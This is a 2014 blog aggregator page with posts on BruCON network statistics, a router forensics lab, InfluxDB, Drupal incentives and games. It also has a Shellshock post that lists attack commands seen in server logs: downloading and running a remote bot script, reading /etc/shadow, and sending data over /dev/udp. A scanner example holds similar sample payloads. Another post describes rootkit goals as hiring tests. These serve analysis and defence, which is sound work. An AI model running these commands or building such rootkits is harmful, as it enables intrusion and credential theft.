4917 apple.com
4102 ey.net
3956 pentesteracademy
3733 appspot.l.google.com
3697 pentesteracademylab.appspot.com
3434 printer
3314 facebook.com
3158 amazon.com
2773 images.amazon.com
2752 ecx.images-amazon.com
2730 twitter.com
2520 ssl
2422 clients.l.google.com

Personally, next year I’d like to create some honeypots to redirect traffic for hosts like “wpad” (Web Proxy Autodiscovery Protocol) or “printer” ;-). We provided a DNS server via DHCP, but many people have fixed DNS servers configured. Funny: a lot of them were RFC1918 IP addresses not used on the BruCON network. Corporate servers?

Count DNS Server
131815 10.4.0.1 (BruCON official DNS)
73294 224.0.0.251
32559 ff02::fb
14887 224.0.0.252
13939 ff02::1:3
6544 8.8.8.8 (Google)
2294 172.246.84.42
883 8.8.4.4 (Google)
565 86.39.202.67
500 208.67.222.222 (OpenDNS)
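To show how the two tables above can be produced from a capture while dropping the PTR noise and flagging resolvers that do not belong to the conference network (the statically configured RFC1918 addresses mentioned earlier), here is an added Python example. It is not part of the original post nor of any BruCON tooling; the tab-separated record format, the 10.4.0.0/16 address plan and the sample lines are constructed assumptions.

```python
"""Added example: top-N DNS queries and resolver usage from a capture log.

Not part of the original post. The log format (tab-separated
timestamp, client, resolver, qtype, query), the 10.4.0.0/16 range
and the sample lines are constructed assumptions.
"""
import ipaddress
from collections import Counter

# Constructed sample records, one DNS request per line.
SAMPLE_LOG = """\
1411900001.1\t10.4.1.20\t10.4.0.1\tA\tgoogle.com
1411900001.2\t10.4.1.20\t10.4.0.1\tPTR\t20.1.4.10.in-addr.arpa
1411900002.0\t10.4.1.31\t10.4.0.1\tA\twpad
1411900002.5\t10.4.1.31\t8.8.8.8\tAAAA\tgoogle.com
1411900003.0\t10.4.1.42\t192.168.1.1\tA\tprinter
1411900003.3\t10.4.1.42\t192.168.1.1\tA\tbrucon.org
1411900004.0\t10.4.1.55\t224.0.0.251\tA\tsomelaptop.local
1411900004.1\t10.4.1.55\t10.4.0.1\tA\twpad
1411900005.0\t10.4.1.61\t172.16.0.53\tA\tgoogle.com
"""

CONFERENCE_NET = ipaddress.ip_network("10.4.0.0/16")  # assumed address plan
OFFICIAL_RESOLVERS = {"10.4.0.1"}                       # handed out via DHCP


def parse_log(text):
    """Parse the constructed tab-separated format into a list of dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, resolver, qtype, query = line.split("\t")
        records.append({"ts": float(ts), "client": client, "resolver": resolver,
                        "qtype": qtype, "query": query.lower()})
    return records


def top_queries(records, n=20, skip_types=("PTR",)):
    """Most requested names, with reverse lookups removed to reduce noise."""
    counts = Counter(r["query"] for r in records if r["qtype"] not in skip_types)
    return counts.most_common(n)


def resolver_usage(records):
    """Which servers the clients actually asked, most used first."""
    return Counter(r["resolver"] for r in records).most_common()


def classify_resolver(addr):
    """Label a resolver address relative to the conference network."""
    ip = ipaddress.ip_address(addr)
    if addr in OFFICIAL_RESOLVERS:
        return "official"
    if ip.is_multicast:
        return "multicast"        # mDNS / LLMNR, not a real resolver
    if ip.is_private and ip not in CONFERENCE_NET:
        return "foreign-private"  # RFC1918 but not ours: statically configured
    if ip.is_private:
        return "local"
    return "public"


def foreign_private_resolvers(records):
    """RFC1918 resolvers that cannot be reached from this network."""
    return sorted({r["resolver"] for r in records
                   if classify_resolver(r["resolver"]) == "foreign-private"})


def local_name_lookups(records, names=("wpad", "printer")):
    """Unqualified names worth watching: clients trust whoever answers them."""
    return Counter(r["query"] for r in records if r["query"] in names)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for name, count in top_queries(recs):
        print(f"{count:6d} {name}")
    for server, count in resolver_usage(recs):
        print(f"{count:6d} {server} ({classify_resolver(server)})")
    print("foreign RFC1918 resolvers:", foreign_private_resolvers(recs))
```

The classification deliberately puts multicast addresses (224.0.0.251, ff02::fb and friends) in their own bucket: they are mDNS and LLMNR chatter, not resolvers a client was configured with, so counting them alongside 10.4.0.1 would inflate the "fixed DNS server" numbers.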

We detected network flows with ~25K unique hosts around the world, mainly to Europe and the United States.

Connections Map

It’s also interesting to search for errors or “weird” traffic. Here is the top-20 of problems/suspicious traffic detected by Bro:

Count Suspicious Behavior
7891 dns_unmatched_msg
3578 dns_unmatched_reply
1607 data_before_established
1456 unmatched_HTTP_reply
1342 possible_split_routing
1017 unescaped_special_URI_char
1015 window_recision
884 line_terminated_with_single_CR
811 above_hole_data_without_any_acks
734 TCP_ack_underflow_or_misorder
453 unknown_packet_type
350 dns_unmatched_msg_quantity
294 DNS_Conn_count_too_large
284 TCP_seq_underflow_or_misorder
270 unknown_protocol_2
210 zero_length_ICMPv6_ND_option
178 non_ip_packet_in_egre
177 bad_HTTP_request
173 connection_originator_SYN_ack
169 inflate_failed

We also provided a Tor SOCKS proxy to the visitors, but it was not heavily used… Maybe promote it more next year? But the brand new wall of sheep was a great success. It is a modified version of Dofler and offers the following features:

Displaying pictures on the fly is dangerous when hackers are the primary audience. That’s why I implemented a skin-color detection filter to prevent most p0rn images from being displayed on the wall of sheep. Of course, it quickly became a new game for some attendees, who tried to display all kinds of (not only p0rn) pictures. Most of the time they succeeded, but the filter was nevertheless working quite well. Check the two following impressive numbers:

About the captured accounts, even if people are more aware and are trying to protect themselves, we collected 242 accounts:

That’s all for my wrap-up!

by Xavier at September 30, 2014 07:06 PM

Frank Goossens

Amazed by Autoptimize take-up

Less than a year after reaching 100000 downloads, Autoptimize broke the 200000 barrier just last week.

It’s also exciting to see how people are blogging (or tweeting) about it as well;

So yeah, I’m pretty amazed by how well Autoptimize is doing. Thanks for the confidence!

by frank at September 30, 2014 06:46 PM

Xavier Mertens

Online Router Forensics Lab

When my friend Didier Stevens contacted me last year to help him with a BruCON 5×5 project, I simply could not decline! Didier developed a framework to perform forensic investigations on Cisco routers. His framework is called NAFT (“Network Appliance Forensic Toolkit”). It is written in Python and provides a good toolbox to extract juicy information from routers’ memory. From a development point of view, the framework was ready, but Didier had the great idea to prepare a workshop to train students to analyze router memory images. The 5×5 project was accepted and, thanks to the support of BruCON, it was possible to buy a bunch of Cisco routers to let students play with them. Why hardware routers and not simply a virtual lab (after all, we are living in the virtualisation era)? For two main reasons: to avoid licensing issues, and because a virtual lab does not offer the ROMMON feature, which is very useful to take a memory image of the router. The very first workshop was given last week during BruCON as a premiere. With a fully booked room of people (40), it was a success and we already got good feedback. But not all people are able to attend security conferences and workshops, and that’s why Didier had the idea to implement an online lab where registered people could perform the same investigations as in the live workshop. That’s where I got involved in the project!

Here are a few words about the lab that has been deployed. It is based on a hardened Linux server and two Cisco 2610 routers connected together. The private network is available to generate some IP traffic. The routers’ serial consoles are also connected. Here is a small diagram of the lab:

NAFT Lab Topology

The Cisco routers can be managed via a telnet connection or via their console port. All tools are pre-installed to perform the memory dump analysis:

To access the lab, you just need an SSH client:

The lab is available to anybody who would like to test Didier’s framework. We also opened a website with information about the project and a booking system. You just have to select the day(s) and fill a small form. Once approved, a temporary account will be created and credentials will be sent.

Presented as an exclusive during BruCON, Didier and I are happy to announce that the lab is publicly available right now via router-forensics.net. If you’re interested in a workshop for your school or your event, feel free to contact us! We have routers ready to go on the road ;-) The next workshop has been scheduled during Hack.lu in Luxembourg.

Routers on the Road

by Xavier at September 30, 2014 02:38 PM

Dieter Plaetinck

A real whisper-to-InfluxDB program.

The whisper-to-influxdb migration script I posted earlier is pretty bad: a shell script, without concurrency, and with an undiagnosed performance issue. I hinted that one could write a Go program using the unofficial whisper-go bindings and the influxdb Go client library. That's what I did now; it's at github.com/vimeo/whisper-to-influxdb. It uses configurable numbers of workers for both whisper fetches and InfluxDB commits, but it's still a bit naive in the sense that it commits to InfluxDB one series at a time, irrespective of how many records are in it. My series, and hence my commits, have at most 60k records, and presumably InfluxDB could handle a lot more per commit, so we might leverage better batching later. Either way, this way I can consistently commit about 100k series every 2.5 hours (or 10/s), where each series has a few thousand points on average, with peaks up to 60k points. I usually play with 1 to 30 InfluxDB workers. Even though I've hit a few InfluxDB issues, this tool has enabled me to fill in gaps after outages and to do a restore from whisper after a complete database wipe.

September 30, 2014 12:37 PM

Dries Buytaert

Scaling Open Source communities

We truly live in miraculous times. Open Source is at the core of the largest organizations in the world. Open Source is changing lives in emerging countries. Open Source has changed the tide of governments around the world. And yet, Open Source can be really difficult. Open Source can be largely a thankless job. It is hard to find volunteers, it is hard to find organizations to donate time or money, it is hard to organize the community, it is hard to learn, it is hard to attract full-time contributors, and more. As the project lead for Drupal, one of the largest Open Source projects/communities in the world, I live these challenges every day. In this blog post, I will analyze the challenge with scaling Open Source communities and recommend a solution for how to build very large Open Source communities.

Open Source projects are public goods

In economic terms, for something to be a "public good", it needs to match two criteria:

  1. non-excludability - it is impossible to prevent anyone from consuming that good, and
  2. non-rivalry - consumption of this good by anyone does not reduce the benefits available to others.

Examples of public goods include street lighting, national defense, public parks, basic education, the road system, etc. By that definition, Open Source software is also a "public good": we can't stop anyone from using Open Source software, and one person benefiting from Open Source software does not reduce the benefits available to others.

The realization that Open Source is a public good is a helpful one because there has been a lot of research about how to maintain and scale public goods.

Public goods and the free-rider problem

The biggest problem with public goods is the "free rider problem". A free rider is someone who uses a public good but who does not pay anything (or pay enough) towards its cost or production. If the maintainers of a public good do not address the free-rider problem it can lead to the non-production or under-production of a public good. This is generally known as the "Tragedy of the Commons".

In Open Source, a free-rider is someone who uses an Open Source software project without contributing to it. If too few people or organizations contribute to the project, the project can become unhealthy, and ultimately could cease to exist.

The free-rider problem is typical for public goods and does not usually arise with private businesses. For example, community-maintained software like Drupal may have many free riders but proprietary competitors like Adobe or Sitecore have no problem excluding those who will not pay a license fee.

To properly understand the free-rider problem and public good provision, we need to understand both self-interest theory and the theory of collective action. I'll discuss both theories and apply them to Open Source.

Self-interest theory

Open Source contributors do amazing things. They contribute to fixing the hardest problems, they share their expertise, and more. Actions like these are often described as altruistic, in contrast to the pursuit of self-interest. In reality, generosity is often driven by some level of self-interest: we provide value to others when it benefits ourselves.

Many reasons exist why people contribute to Open Source projects; people contribute because they enjoy being part of a community of like-minded people, to hone their technical skills, to get recognition, to try and make a difference in the world, because they are paid to, or for different forms of "social capital". Often we contribute because by improving the world we are living in, we are making our world better too.

Modern economics suggests that both individuals and organizations tend to act in their own self-interest, bound by morals, ethics, the well-being of future generations and more. The theory of self-interest goes back to the writings of the ancient Greeks, was championed by early modern economists, and is still adhered to by late-modern economists. It follows from the theory of self-interest that we'd see more individuals and organizations contribute if they received more benefits.

While contributing to Open Source clearly has benefits, it is not obvious if the benefits outweigh the cost. If we can increase the benefits, there is no doubt we can attract more contributors.

Collective action theory

The theory of self-interest also applies to groups of individuals. In his seminal work on collective action and public goods, economist Mancur Olson shows that the incentive for group action diminishes as group size increases. Large groups are less able to act in their common interest than small ones because (1) the complexity increases and (2) the benefits diminish.

We see this first hand in Open Source projects. As an Open Source project grows, aspects of the development, maintenance and operation have to be transferred from volunteers to paid workers. Linux is a good example. Without Red Hat, IBM and Dell employing full-time Linux contributors, Linux might not have the strong market share it has today.

The concept of major public goods growing out of volunteer and community-based models is not new to the world. The first trade routes were ancient trackways, which citizens later developed on their own into roads suited for wheeled vehicles in order to improve commerce. Transportation was improved for all citizens, driven by the commercial interest of some. Today, we certainly appreciate that full-time government workers maintain the roads. Ditto for the national defense system, basic education, etc.

The theory of collective action also implies that as an Open Source project grows, we need to evolve how we incentivize contributors or we won't be able to attract either part-time volunteers or full-time paid contributors.

Selective benefits

Solutions for the free-rider problem and collective action problem exist, and this is where Open Source can learn from public goods theory and research. The most common solution for the free-rider problem is taxation; the government mandates all citizens to help pay for the production of the public good. Taxpayers help pay for our basic education system, the road system and national defense for example. Other solutions are privatization, civic duty or legislation. These solutions don't apply to Open Source.

I believe the most promising solution for Open Source is known as "privileged groups". Privileged groups are those who receive "selective benefits". Selective benefits are benefits that can motivate participation because they are available only to those who participate. The study of collective action shows that public goods are still produced when a privileged group benefits more from the public good than it costs them to produce it.

In fact, prominent "privileged groups" examples exist in the Open Source community; Automattic is a privileged group in the WordPress community as it is in a unique position to make many millions of dollars from WordPress.com. Mozilla Corporation, the for-profit subsidiary of the Mozilla Foundation, is a privileged group as it is in a unique position to get paid millions of dollars by Google. As a result, both Automattic and Mozilla Corporation are willing to make significant engineering investments in WordPress and Mozilla, respectively. Millions of people in the world benefit from that every day.

Drupal is different from Automattic and Mozilla in that no single organization benefits uniquely from contributing. For example, my company Acquia currently employs the most full-time contributors to Drupal but does not receive any exclusive benefits in terms of monetizing Drupal. While Acquia does accrue some value from hiring the Drupal contributors that it does, this is something any company can do.

Better incentives for Drupal contributors

It's my belief that we should embrace the concept of "privileged groups" and "selective benefits" in the Drupal community to help us grow and maintain the Drupal project. Furthermore, I believe we should provide "selective benefits" in a way that encourages fairness and equality, and doesn't primarily benefit any one particular organization.

From the theory of self-interest it follows that to get more paid core contributors we need to provide more and better benefits to organizations that are willing to let their employees contribute. Drupal agencies are looking for two things: customers and Drupal talent.

Many organizations would be eager to contribute more if, in return, they were able to attract more customers and/or Drupal talent. Hence, the "selective benefits" that we can provide them are things like:

  • Organizational profile pages on drupal.org with badges or statistics that prominently showcase their contributions,
  • Advertising on the drupal.org in exchange for fixing critical bugs in Drupal 8 (imagine we rewarded each company that helped fix a critical Drupal 8 bug 10,000 ad views on the front page of drupal.org),
  • Better visibility on Drupal.org's job board for those trying to hire Drupal developers,
  • The ability to sort the marketplace by contributions, rather than just alphabetically
  • ...

I'm particularly excited about providing ads in exchange for contributing. Contributing to Drupal now becomes a marketing expense; the more you contribute, the more customers you can gain from drupal.org. We can even direct resources; award more ad views in exchange for fixing UX problems early in the development cycle, but award critical bugs and beta blockers later in the development cycle. With some relatively small changes to drupal.org, hiring a full-time core developer becomes a lot more interesting.

By matching the benefits to the needs of Drupal agencies, we can direct more resources towards Drupal development. I also believe this system to be fair; all companies can choose to contribute to Drupal 8 and earn advertising credits, and all participants are rewarded equally. We can turn Drupal.org into a platform that encourages and directs participation from a large number of organizations.

Systems like this are subject to gaming but I believe these challenges can be overcome. Any benefit is better than almost no benefit. In general, it will be interesting to see if fairness and heterogeneity will facilitate or impede contribution compared to Open Source projects like WordPress and Mozilla, where some hold unique benefits. I believe that if all participants benefit equally from their contributions, they have an incentive to match each other's contributions and it will facilitate the agreement and establishment of a contribution norm that fosters both cooperation and coordination, while minimizing gaming of the system. In contrast, when participants benefit very differently, like with WordPress and Mozilla, this decreases the willingness to cooperate, which, in turn, could have detrimental effects on contributions. While not necessarily the easiest path, I believe that making the system fair and heterogeneous is the "Drupal way" and that it will serve us in the long term.

Conclusions

There are plenty of technical challenges ahead of us that we need to work on, fun ideas that we should experiment with, and more. With some relatively small changes, we could drastically change the benefits of contributing to Drupal. Better incentives mean more contributors, and more contributors mean that we can try more things and do things better and faster. It means we can scale Drupal development to new heights and with that, increase Open Source's impact on the world.

(I talked about this in my DrupalCon Amsterdam keynote. If you're hungry for more, I recommend that you check out my slides.)

by Dries at September 30, 2014 09:47 AM

Philip Van Hoof

nrl:maxCardinality one-to-many ontology changes

I added support for changing the nrl:maxCardinality property of an rdfs:Property from one to many. Earlier Martyn Russel reverted such an ontology change as this was a blocker for the Debian packaging by Michael Biebl.

We only support going from one to many. That’s because going from many to one would obviously imply data-loss (a string-list could work with CSV, but an int-list can’t be stored as CSV in a single-value int type – instead of trying to support nonsense I decided to just not do it at all).

More supported ontology changes can be found here.

Not sure if people care but this stuff was made while listening to Infected Mushroom.

by admin at September 30, 2014 12:12 AM

September 29, 2014

Philip Van Hoof

Protect us against eavesdropping, and only eavesdrop yourself within a legal framework

The government should protect our citizens against eavesdropping; the government can and may eavesdrop itself, but can and may only do so within a legal framework.

All sorts of things show that governments within the NATO alliance are attacking our country with digital break-ins. It worries me.

Technically, this means to me that our country must invest in securing its systems. That includes knowledge of and control over hardware and software at a deep level.

I hope Pieter De Crem invests not only in fighter jets but also in securing the country’s computer systems.

To me that means knowledge and control at the level of the bootloader, the kernel and the hardware. After all, the government’s systems contain an enormous amount of citizens’ data. The army’s systems in turn give information about and access to equipment that guarantees the security and the peace of the country.

As for the kernel, a recruit should go through Robert Love’s book in the days before the job interview. He or she must be able to build a kernel module with the Internet as help. That is a minimum.

A good technical test would be to write one’s own rootkit kernel module during the days the job interview takes place (yes, days). A few objectives could be set for this: e.g. hiding the .ko file on the filesystem that was earlier loaded with insmod, copying all outgoing TCP/IP data to a hidden piece of hardware, and so on.

The latter without using much of the host’s memory, since the hidden piece of hardware will presumably be slower than the normal network interface (eth0 versus e.g. 3G). One solution could be filtering, combined with occasionally causing some packet loss through hidden netif_stop_queue and netif_wake_queue calls on the normal network interface. Maybe the recruit has better ideas that are hard or impossible to detect? I hope so!

The recruit must provide a way (one that is not obvious) to receive commands (preferably one that is hard to detect). Maybe using radio in such a way that it is hard to detect? I am curious.

The more of these objectives are achieved, the more suitable the candidate.

As for userland, a recruit must, given a piece of code containing a typical buffer overflow bug, recognise that buffer overflow. But grant your recruit the time and a relaxed atmosphere, because under stress only the lucky ones occasionally spot something like that. Reviewing (good) code is something that requires many years of experience (bad code is easier, but today’s security problems are not about the world’s bad code, such as dnsmasq. They are about e.g. OpenSSL and Bash).

The next question could be to have injected code executed by means of that buffer overflow. This may be done with the help of the Internet to find all the answers. Extra points when the executed code, with or without netcat, makes the thing available on a TCP/IP port.

The service could e.g. build a socket server that has a buffer overflow on the buffer that is passed to read(). Even a junior C developer should recognise that.

These kinds of tests are needed because only those who technically know (and can implement) how to hide themselves after a break-in are suitable to defend the country against the NSA and GCHQ.

I am convinced that those who can do this have a fairly good moral compass: people with such insight have capabilities. Such people therefore often also have a well-considered moral compass. As long as the government follows its own moral compass, these people are willing to put their abilities to work for the government.

Mister army colonel must realise that the average programmer really just wants to understand technology. That this technology happens to be used for bombs too is not the programmers’ fault. That the colonel’s communication technology is full of bugs does not mean that the programmers who find them are criminals. Colonel sir would do better to pray to Thor that the country’s programmers find out before the real enemy does.

But the law stands above the military. It must be followed. Also by the intelligence services. It is our only guarantee of a free society: I do not want to work on, or have helped with, a world in which citizens lose freedoms like privacy through technology.

Kind regards,

Philip. Programmer.

by admin at September 29, 2014 11:45 PM

Xavier Mertens

Some Personal Shellshock Stats

In April 2014, the Internet shivered when we faced the “heartbleed” bug in the OpenSSL library. It made a lot of noise across the security community and was even covered by regular media. Such an issue could never happen again, right?

Never say never! Last week, a new storm hit the Internet with “shellshock”, better known as CVE-2014-6271! This new bug affects the bash UNIX shell. The difference with heartbleed? When you compare them, heartbleed definitively loses its pole position among the top threats. It is very easy to exploit, and it affects MANY applications or services that spawn other processes using calls like system() in PHP or the well-known mod_cgi provided by Apache. Not only public websites can be affected, but also some critical services like:

So, any service that executes a bash shell with an environment defined by external input. If you need more info about this new threat, google for it!

Some security researchers and bloggers immediately started to scan the Internet to get a better idea of the impact of this vulnerability on public services. Of course, bad guys also started to do the same, and my server was hit several times (94). Until today, I detected the following IP addresses:

109.80.232.48
109.95.210.196
119.82.75.205
128.199.223.129
128.204.199.209
166.78.61.142
176.10.107.180
178.32.181.108
2001:4800:7812:514:1b50:2e05:ff04:c849:52116
209.126.230.72
24.251.197.244
54.251.83.67
62.210.75.170
79.99.187.98
80.110.67.10
83.166.234.133
89.207.135.125
89.248.172.139
93.103.21.231

Here is a list of commands/scripts tested:

/bin/ping -c 1 198.101.206.138
/bin/bash -c "echo testing9123123"; /bin/uname -a
/sbin/ifconfig
/bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
echo -e "Content-Type: text/plain\\n"; echo qQQQQQq
/bin/cat /etc/shadow
echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444
/bin/bash -c "/usr/bin/wget http://singlesaints.com/firefile/temp?h=rootshell.be -O /tmp/a.pl"
/bin/bash -c "wget -q -O /dev/null http://ad.dipad.biz/test/http://leakedin.com/"
/bin/bash -c "wget -U BashNslash.http://www.leakedin.com/tag/urls-list/page/97/ 89.248.172.139"
wget 'http://taxiairportpop.com/s.php?s=http://brucon.org/'

Personally, I like the one which tries to use bash’s built-in socket support via pseudo files like “/dev/[tcp|udp]/<host>/<port>”. This is a nice feature of bash but it is disabled on most distributions (precisely for security reasons).
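As a defender-side complement to the list above, here is an added Python example that scans Apache combined-format access log lines for the two indicators visible in those probes: a bash function definition smuggled into a request header (which mod_cgi copies into the environment of the spawned process) and use of the /dev/tcp or /dev/udp pseudo files. It is not the author’s code; the log lines are constructed and use RFC 5737 documentation addresses.

```python
"""Added example: flag Shellshock-style probes in Apache access logs.

Not the author's code. The log lines are constructed and use
RFC 5737 documentation addresses.
"""
import re
from collections import Counter

# Constructed sample in Apache "combined" format.
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [25/Sep/2014:10:12:01 +0200] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/ping -c 1 198.51.100.9"
203.0.113.4 - - [25/Sep/2014:10:12:05 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [25/Sep/2014:10:13:44 +0200] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :;}; echo shellshock-scan > /dev/udp/203.0.113.99/4444" "curl/7.37.0"
203.0.113.8 - - [25/Sep/2014:10:14:10 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "-" "() { ignored;}; /bin/uname -a"
"""

# Apache combined log: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A header value that starts a bash function definition "() {" is the
# hallmark of CVE-2014-6271 probes: the CGI handler exports request headers
# as environment variables, which a vulnerable bash then parses as code.
FUNC_DEF_RE = re.compile(r"\(\)\s*\{")
# bash's /dev/tcp and /dev/udp pseudo files, used by probes for call-backs.
DEV_SOCKET_RE = re.compile(r"/dev/(?:tcp|udp)/")


def scan_line(line):
    """Return a finding for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    for field in ("req", "ref", "ua"):
        value = m.group(field)
        if FUNC_DEF_RE.search(value):
            hits.append((field, "env-function-definition"))
        if DEV_SOCKET_RE.search(value):
            hits.append((field, "dev-socket"))
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "request": m.group("req"), "hits": hits}


def scan_access_log(text):
    """All findings in a log, in file order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


def sources(findings):
    """Probe count per source address, like the list in the post."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_ACCESS_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["request"], f["hits"])
    print(sources(found))
```

Only the request line, referer and user-agent are inspected because those are the header values the combined format records; a probe can just as well arrive in Cookie or any custom header, so on a real server the same check belongs in a mod_security rule or on the CGI handler's full header set, not only in after-the-fact log review.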

by Xavier at September 29, 2014 06:59 PM

FOSDEM organizers

Accepted developer rooms

We are pleased to announce the developer rooms that will be organised at FOSDEM 2015. Developer rooms are assigned to self-organising groups to work together on open source projects, to discuss topics relevant to a broader subset of the community, etc. The individual developer room organisers will issue their calls for participation in the next few days. We will update this table with links to the calls for participation.

Both days (31 January & 1 February 2015)

Topic Call for participation CFP deadline
Distributions announcement 2014-12-07
Embedded announcement 2014-12-01
Graphics - TBA
Java announcement 2014-12-01

Saturday 31 January 2015

September 29, 2014 03:00 PM

Joram Barrez

Webinar ‘Process Driven Spring Applications with Activiti’ now on Youtube

As I mentioned, I did a webinar on Spring Boot + Activiti last week (at 6 am …. yes, it hurt) with my good pal Josh Long. If you missed it, or want to see the awesomeness again, here’s the recording:   On a similar note, the webinar that Josh did before this one, on Spring […]

by Joram Barrez at September 29, 2014 10:46 AM

September 27, 2014

Damien Sandras

GNOME 3 and HIG Love

I am making progress on the next Ekiga release. I have spent the last few months of spare time working on the user interface. The purpose is to adapt the UI and use the great GTK+3 features when adequate. There is still much left to do, but here are before and after screenshots. Stay tuned […]

by Damien Sandras at September 27, 2014 04:56 PM

September 25, 2014

Frank Goossens

Music from Our Tube; Benjamin Booker’s Violent Shiver

“Violent Shiver” was Benjamin Booker’s very first single. And it’s an impressive one, as far as one-song-debuts go. This is a live version recorded for WFUV.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at September 25, 2014 11:09 PM

September 24, 2014

Frank Goossens

The Broken Smartphone Breakdown

I’m a spoiled, clumsy brat. Spoiled because my (previous) employer hands out yearly vouchers, which I use to buy myself a new top-notch smartphone every 2-3 years. And clumsy as I all too often lose or break those expensive gadgets, forcing me to look for cheaper replacements. So here’s the breakdown of my smartphone history;

  1. 2009: HTC Hero: my first smartphone (although I wasn’t complaining about that 2nd hand Nokia e61i). I lost it on the train a year and a half after buying it
  2. 2011: Acer beTouch e110: cheap replacement for the HTC Hero, only used it for a couple of weeks before selling it because it was a horrible excuse of a smartphone.
  3. 2011: HTC Magic: 2nd hand replacement, it was a great little handset once it was flashed with Cyanogenmod. I sold it for my next new phone, the …
  4. 2011: Samsung Galaxy SII: Had a great time with that Sammy, lots of upgrades & tweaks. but I did need to have it repaired within a year of buying it, after it fell out of my pocket when getting off the train.
  5. 2012: Samsung Omnia 7: My first encounter with the Windows Phone Metro interface as a temporary device, while the SII was getting fixed.
  6. 2012: Samsung Galaxy SII: back from repairs and was very happy with it, but a year after that it broke down again.
  7. 2013: HTC Radar: temporary replacement for the SII, Windows Phone again.
  8. 2013: Samsung Galaxy S4: A brand new handset which I dropped approx. a year after buying it. Not really a huge leap forward compared to the SII, but I did love the speed improvements 4G offered.
  9. 2014: Samsung Galaxy Gio: temporary replacement for the broken S4, but despite the fact I got my main apps up and running (incl. Firefox Mobile), the old version of Android (2.3.6), the small screen and a serious lack of memory decided this was not a permanent replacement.
  10. 2014: Google Galaxy Nexus: 2nd hand replacement (bought yesterday, a steal for only €95) with Cyanogenmod 11. Early days, but I just might try not to drop it; I’m loving it already. The only thing I really miss is 4G support, because, after all, I am a spoiled brat.

by frank at September 24, 2014 03:07 PM

Dieter Plaetinck

InfluxDB as a graphite backend, part 2

Updated Oct 1, 2014 with a new Disk space efficiency section which fixes some mistakes and adds more clarity.

The Graphite + InfluxDB series continues.

  • In part 1, "On Graphite, Whisper and InfluxDB" I described the problems of Graphite's whisper and ceres, why I disagree with common graphite clustering advice as being the right path forward, what a great timeseries storage system would mean to me, why InfluxDB - despite being the youngest project - is my main interest right now, and introduced my approach for combining both and leveraging their respective strengths: InfluxDB as an ingestion and storage backend (and at some point, realtime processing and pub-sub) and graphite for its renowned data processing-on-retrieval functionality. Furthermore, I introduced some tooling: carbon-relay-ng to easily route streams of carbon data (metrics datapoints) to storage backends, allowing me to send production data to Carbon+whisper as well as InfluxDB in parallel, and graphite-api, the simpler Graphite API server, with graphite-influxdb to fetch data from InfluxDB.
  • Not Graphite related, but I wrote influx-cli which I introduced here. It allows you to easily interface with InfluxDB and measure the duration of operations, which will become useful for this article.
  • In the Graphite & Influxdb intermezzo I shared a script to import whisper data into InfluxDB and noted some write performance issues I was seeing, but the better part of the article described the various improvements done to carbon-relay-ng, which is becoming an increasingly versatile and useful tool.
  • In part 2, which you are reading now, I'm going to describe recent progress, share more info about my setup, testing results, state of affairs, and ideas for future work.


September 24, 2014 11:56 AM

September 21, 2014

Steven Wittens

The Cargo Cult of Game Mechanics

Form without Function

There's been a lot of fuss about gaming and gaming culture lately, in particular the nature of gaming journalism. Don't worry, I'm so not sticking my face into that particular beehive. However, I do agree the conversation around gaming is crap, so instead I'm posting the kind of opinion piece I wish I'd see on credible gaming sites, as someone who actually knows how the sausage is made.

Dear Esther

But is it Art?

Gamers like to talk—or argue—about graphics, frame rates, physics, hours of play time, item variety, models, textures, downloadable content and microtransactions, and so on. There is a reason the Glorious PC Master Race and the Console Wars are memes. If games are art, if it's a grown up medium, why do we fuss about trivialities so much? You don't debate high literature by critiquing the paper stock or chapter length.

Well because production values are important for immersion. Details and performance really matter. However when we treat games just as mechanical live pictures, we're missing the point entirely. It's confusing form with function. In The Dark Knight, Heath Ledger's Joker should look the part, but he'll be 10x scarier and more interesting once you understand how he operates and thinks. This seems obvious in film, yet not in gaming.

Even "artistic games" like Dear Esther are often criticized for superficial mechanics (or lack thereof), not for what they set out to do. The question isn't whether Dear Esther is just a walking simulator. It's whether it's anywhere near as engaging as walking around a real place, like a park or a museum. If it fails, it's not because there aren't any puzzles. The Anne Frank House in Amsterdam does not require puzzles. It does have a secret passage but the only achievement you get for finding it is sadness.

Yup, that awkward pause is where the "gaming as a serious medium" debate usually hangs, and it leaves the conversation severely deadlocked. Trying to add gamified elements for the heck of it, to make a gamier game, rings hollow and does not get us any closer to credibility.

Heavy Rain

The popular alternative is to simply adopt the current forms of Serious Media. To make a game more like a movie or a book, whether blockbuster or arthouse. It generally involves taking away choice, using scripts instead of simulations, with mini-games and quick-time events thrown in to amuse your hindbrain. It's tacitly saying that real storytelling, real human comedy or tragedy, can't happen while a player is in control. It's nonsense, of course; plenty of games have done so before.

Somehow though we've forgotten how to do it, and I don't think I'm alone in thinking this. This existential crisis was perfectly embodied in indie gem The Stanley Parable, a post-modern tale of choice. It's a game about playing a game, constantly breaking the fourth wall. There are recursive gags, self-parodying achievements, 'victory' conditions that require you to quit the game, and other surgical strikes at typical gaming habits. It garnered critical praise from gamers and journalists alike, playing like a love-hate letter to its audience: at times cooperative and happy, other times sardonic and sadistic.

The Stanley Parable

